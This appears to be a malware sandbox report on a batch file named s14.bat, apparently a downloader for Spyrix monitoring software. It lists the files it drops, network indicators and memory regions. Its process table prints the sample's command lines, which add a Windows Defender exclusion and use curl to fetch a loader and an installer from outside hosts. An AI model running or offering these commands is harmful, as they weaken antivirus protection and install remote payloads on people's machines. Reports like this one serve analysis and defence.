Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
s14.bat
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_021vghwn.wmz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lciiolt.coi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0na20a1.czt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrgqhyxv.f3a.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb3rd5eu.sku.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ssxmx3vh.ues.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2yprijk.v3v.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqh0u2g4.3fg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\s14\l
|
ASCII text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\s14\stld2.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\s14\stld3.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
|
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\reg.exe
|
reg query "HKU\S-1-5-19\Environment"
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
||
|
C:\Windows\System32\timeout.exe
|
timeout 10
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
||
|
C:\Windows\System32\timeout.exe
|
timeout 10
|
||
|
C:\Windows\System32\curl.exe
|
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://cdnbaynet.com/loader/link.php?prg_id=sfkkj
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe6M
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exetM
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.co
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfk
|
167.114.14.170
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exei
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfkhmi
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfk9j
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exedM
|
unknown
|
||
|
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
|
unknown
|
||
|
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
|
unknown
|
There are 5 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
cdnbaynet.com
|
167.114.14.170
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
167.114.14.170
|
cdnbaynet.com
|
Canada
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1C9F616E000
|
heap
|
page read and write
|
||
|
1E7C1B50000
|
heap
|
page read and write
|
||
|
3437FFF000
|
stack
|
page read and write
|
||
|
1C1E457D000
|
heap
|
page read and write
|
||
|
1D182574000
|
heap
|
page read and write
|
||
|
1C1E46F0000
|
heap
|
page read and write
|
||
|
3D4A8FF000
|
stack
|
page read and write
|
||
|
3D4A6FC000
|
stack
|
page read and write
|
||
|
343827F000
|
stack
|
page read and write
|
||
|
6DD2CFE000
|
stack
|
page read and write
|
||
|
2A82EC30000
|
heap
|
page read and write
|
||
|
1B142DD0000
|
heap
|
page read and write
|
||
|
1C9F6159000
|
heap
|
page read and write
|
||
|
1B1447F4000
|
heap
|
page read and write
|
||
|
2A82ECB0000
|
heap
|
page read and write
|
||
|
1C1E457B000
|
heap
|
page read and write
|
||
|
AF46A7E000
|
stack
|
page read and write
|
||
|
F9A937F000
|
stack
|
page read and write
|
||
|
1C1E45AB000
|
heap
|
page read and write
|
||
|
1C9F60B0000
|
heap
|
page read and write
|
||
|
1C1E4530000
|
heap
|
page read and write
|
||
|
1C1E454D000
|
heap
|
page read and write
|
||
|
1C1E44B0000
|
remote allocation
|
page read and write
|
||
|
1C1E4592000
|
heap
|
page read and write
|
||
|
1E7C1DC4000
|
heap
|
page read and write
|
||
|
1D182280000
|
heap
|
page read and write
|
||
|
1C1E456A000
|
heap
|
page read and write
|
||
|
6DD2AFD000
|
stack
|
page read and write
|
||
|
1C1E4541000
|
heap
|
page read and write
|
||
|
1C9F6454000
|
heap
|
page read and write
|
||
|
1C1E4592000
|
heap
|
page read and write
|
||
|
1C1E4390000
|
heap
|
page read and write
|
||
|
1B142E40000
|
heap
|
page read and write
|
||
|
1D182570000
|
heap
|
page read and write
|
||
|
1C1E4546000
|
heap
|
page read and write
|
||
|
1C1E454D000
|
heap
|
page read and write
|
||
|
1C1E4490000
|
heap
|
page read and write
|
||
|
1E7C1DC0000
|
heap
|
page read and write
|
||
|
3D4A7FE000
|
stack
|
page read and write
|
||
|
1D182360000
|
heap
|
page read and write
|
||
|
233D6278000
|
heap
|
page read and write
|
||
|
1C1E44B0000
|
remote allocation
|
page read and write
|
||
|
F9A927D000
|
stack
|
page read and write
|
||
|
233D61F0000
|
heap
|
page read and write
|
||
|
1D1823D0000
|
heap
|
page read and write
|
||
|
233D6270000
|
heap
|
page read and write
|
||
|
233D7D00000
|
heap
|
page read and write
|
||
|
1C9F6163000
|
heap
|
page read and write
|
||
|
AF46AFE000
|
stack
|
page read and write
|
||
|
6DD2BFE000
|
stack
|
page read and write
|
||
|
F255FE000
|
stack
|
page read and write
|
||
|
1B142E10000
|
heap
|
page read and write
|
||
|
1D182380000
|
heap
|
page read and write
|
||
|
1E7C1B98000
|
heap
|
page read and write
|
||
|
2A82EED0000
|
heap
|
page read and write
|
||
|
1B142E49000
|
heap
|
page read and write
|
||
|
1D1823EE000
|
heap
|
page read and write
|
||
|
1C1E454E000
|
heap
|
page read and write
|
||
|
F9A92FE000
|
stack
|
page read and write
|
||
|
1C1E45AB000
|
heap
|
page read and write
|
||
|
1E7C1BA1000
|
heap
|
page read and write
|
||
|
1D1823D9000
|
heap
|
page read and write
|
||
|
66D5FFF000
|
stack
|
page read and write
|
||
|
AF4679C000
|
stack
|
page read and write
|
||
|
1C9F60C0000
|
heap
|
page read and write
|
||
|
1C1E45AB000
|
heap
|
page read and write
|
||
|
2A82EED5000
|
heap
|
page read and write
|
||
|
1E7C1B90000
|
heap
|
page read and write
|
||
|
233D6240000
|
heap
|
page read and write
|
||
|
3437F7C000
|
stack
|
page read and write
|
||
|
66D5EFF000
|
stack
|
page read and write
|
||
|
1C9F6150000
|
heap
|
page read and write
|
||
|
1B142CF0000
|
heap
|
page read and write
|
||
|
1C1E4538000
|
heap
|
page read and write
|
||
|
1B1447F0000
|
heap
|
page read and write
|
||
|
1E7C1B60000
|
heap
|
page read and write
|
||
|
F256FF000
|
stack
|
page read and write
|
||
|
66D5B6D000
|
stack
|
page read and write
|
||
|
233D6200000
|
heap
|
page read and write
|
||
|
1C1E456A000
|
heap
|
page read and write
|
||
|
1C9F60E0000
|
heap
|
page read and write
|
||
|
2A82EC40000
|
heap
|
page read and write
|
||
|
1C1E4546000
|
heap
|
page read and write
|
||
|
1C1E4582000
|
heap
|
page read and write
|
||
|
233D7D04000
|
heap
|
page read and write
|
||
|
1C1E4543000
|
heap
|
page read and write
|
||
|
1C1E454D000
|
heap
|
page read and write
|
||
|
1C1E457C000
|
heap
|
page read and write
|
||
|
1E7C1D60000
|
heap
|
page read and write
|
||
|
2A82EC60000
|
heap
|
page read and write
|
||
|
1C1E4550000
|
heap
|
page read and write
|
||
|
F254FD000
|
stack
|
page read and write
|
||
|
1D1823E3000
|
heap
|
page read and write
|
||
|
1C1E456A000
|
heap
|
page read and write
|
||
|
1C1E4470000
|
heap
|
page read and write
|
||
|
2A82ECB7000
|
heap
|
page read and write
|
||
|
1C1E454D000
|
heap
|
page read and write
|
||
|
1C1E456A000
|
heap
|
page read and write
|
||
|
1C9F6450000
|
heap
|
page read and write
|
||
|
1C1E44B0000
|
remote allocation
|
page read and write
|
There are 90 hidden memdumps, click here to show them.